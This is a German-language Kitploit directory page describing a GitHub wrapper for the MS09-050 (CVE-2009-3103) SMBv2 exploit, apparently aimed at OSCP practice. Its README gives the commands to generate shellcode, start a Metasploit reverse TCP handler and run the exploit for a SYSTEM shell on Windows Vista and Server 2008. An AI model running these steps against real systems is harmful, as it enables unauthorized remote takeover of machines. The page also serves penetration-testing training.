Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
ms09-050-CVE-2009-3103-exploit — Automatisierter Exploit-Wrapper für MS09-050 (CVE-2009-3103), der SMBv2 auf Windows Vista/Server 2008 angreift. Generiert Shellcode, erstellt den Exploit und erzeugt einen Metasploit-Handler für SYSTEM-Shell-Zugriff. | Kitploit
Tools/GitHubGitHub/nicolasdamians/ms09-050-cve-2009-3103-exploit
Payload-GenerierungSchwachstellenanalyseExploitationShellcodePenetrationstestsLernen & Bildung
GitHubnicolasdamians/ms09-050-cve-2009-3103-exploit

ms09-050-CVE-2009-3103-exploit

Automatisierter Exploit-Wrapper für MS09-050 (CVE-2009-3103), der SMBv2 auf Windows Vista/Server 2008 angreift. Generiert Shellcode, erstellt den Exploit und erzeugt einen Metasploit-Handler für SYSTEM-Shell-Zugriff.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
7vor 9 MonatenNoch nicht geprüft
Teilen

MS09-050 SMBv2 Exploit Wrapper

Einzeiler-Setup für die Ausnutzung von MS09-050 (CVE-2009-3103). Kein Ärger, kein Debugging, funktioniert einfach.

Warum?

Die meisten MS09-050-Skripte, die herumschwirren, erfordern manuelle Shellcode-Injektion, haben Timing-Probleme mit Handlern oder funktionieren einfach nicht. Dieser Wrapper:

  • Generiert Shellcode mit korrekten Parametern
  • Erstellt den Exploit automatisch
  • Erstellt einen gebrauchsfertigen Metasploit-Handler
  • Sagt Ihnen genau, was Sie ausführen müssen

Entwickelt für die OSCP-Vorbereitung, bei der Zeit eine Rolle spielt.

Ziel

  • Schwachstelle: MS09-050 / CVE-2009-3103
  • Betroffen: Windows Vista SP1/SP2, Windows Server 2008 (vor R2)
  • Dienst: SMBv2 auf Port 445
  • Ergebnis: SYSTEM Shell

Anforderungen

  • Kali Linux (oder eine beliebige Distribution mit Metasploit)
  • msfvenom
  • msfconsole
  • python2
  • rpcclient (normalerweise vorinstalliert)

Verwendung

./ms09_050.sh <TARGET_IP> <YOUR_IP> [PORT]

Beispiel

./ms09_050.sh 192.168.233.40 192.168.45.232 443

Ausgabe:

[*] Target: 192.168.233.40 | LHOST: 192.168.45.232 | LPORT: 443
[*] Generating shellcode...
[+] Files created:
    - exploit.py
    - handler.rc

=== RUN ===

Terminal 1:  msfconsole -q -r handler.rc
Terminal 2:  python2 exploit.py 192.168.233.40

Ausführung

  1. Terminal 1 - Handler starten:

    msfconsole -q -r handler.rc
    

    Warten auf: Started reverse TCP handler on ...

  2. Terminal 2 - Exploit ausführen:

    python2 exploit.py 192.168.233.40
    
  3. Überprüfen Sie Terminal 1 auf Ihre Shell.

Hinweise

  • Verwendet gestaffeltes Payload (windows/shell/reverse_tcp) - funktioniert zuverlässig mit dem Stager in diesem Exploit
  • Wenn der Exploit fehlschlägt, muss das Ziel möglicherweise neu gestartet werden oder ist nicht anfällig
  • Port 443 empfohlen, wenn 4444 gefiltert ist

Danksagungen

Original-Exploit basierend auf ohnozzy's MS09-050 PoC.

Lizenz

MIT - Mach was du willst, sei nur nicht böse.

Tool herunterladen